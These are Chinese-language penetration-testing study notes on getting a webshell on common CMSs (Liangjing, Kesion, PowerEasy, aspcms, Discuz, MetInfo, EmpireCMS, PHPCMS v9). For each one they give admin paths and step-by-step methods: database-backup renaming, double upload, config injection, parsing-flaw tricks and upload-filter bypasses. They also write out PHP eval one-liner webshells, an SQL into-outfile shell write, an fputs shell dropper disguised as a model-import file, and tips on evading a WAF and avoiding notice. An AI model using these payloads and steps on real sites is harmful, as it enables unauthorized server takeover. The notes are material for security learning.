渗透测试学习 二十三、常见cms拿shell

常见cms

良精、科讯、动易、aspcms、dz

米拓cms、phpcms2008、帝国cms、phpv9

phpweb、dedecms

良精

方法：

1、数据库备份拿shell

上传图片——点击数据库备份——改为脚本格式——添加账号，讲一句话添加在用户名处——备份——改为脚本格式

2、双文件上传

3、配置插马

4、修改文件上传类型直接上传

科讯（用IE）

/admin/admin.asp   后台路径

1、利用解析漏洞

2、设置——网站基本信息设置——默认允许上传文件类型，将asp改为aaspsp（会将asp替换为空）

内容——图片添加——上传时改为aaspsp

设置——基本设置——其它选项——通用页面目录——html/a.asp/（目录解析）——标签——自定义静态标签——增加静态标签——插入一句话——自定义页面——生成一个页面，会在a.asp目录下

动易（学校，简单的企业）

在网站配置中插马——连接inc/config.asp文件

数据库备份

双文件上传

aspcms

界面风格——编辑模板/css文件（利用IIS6.0解析漏洞）——添加——文件系统——a.asp;html——内容插入一句话

拓展功能——幻灯片设置——插马

dz

uckey或利用插件上传（常见的网站discuz x2.5）

后台 admin.php或cu_server

站长——ucenter设置（通过配置插马，闭合拿shell）

站长——数据库备份（或短文件漏洞）

米拓cms

metinfo 5.3.18                   install/phpinfo.php——里面能找到网站根目录

后台         admin/index.php （上传图片马 包含文件）

后台——安全——数据库备份——下载——打开（txt）——在完整的一句话后面写入新的一句话（select “<?php @eval($_POST[A]);?>” into outfile ‘网站根目录，路径写成Linux路径’）——恢复（一般在晚上没有数据交互的时候再做）

权限要求很高

帝国cms

empircms-v6.6

127.0.0.1/e/install

后台：127.0.0.1/e/admin/index.php

后台——数据表与系统模型——管理数据表——管理系统表模型——导入系统模型（要导.mod的文件）——<?fputs(fopen(“cnm.php”,”w”),”<?eval(\$_POST[cmd];)?>”)?>保存为mod文件，文件名为aa.php.mod——记住导入的目录路径/e/admin/cnm.php

注意：导入时候可能会有waf，可以在脚本中加入免杀的一句话

phpv9

phpcms_v9.6.3_GBK

127.0.0.1/install

后台——界面——模板风格——详情列表——search——编辑插马

后台——phpsso——系统管理——ucenter配置——uc_config.php中 ‘);eval($_post[a]);#

后台——内容——专题         phpv9低权限拿shell

phpweb

dedecmd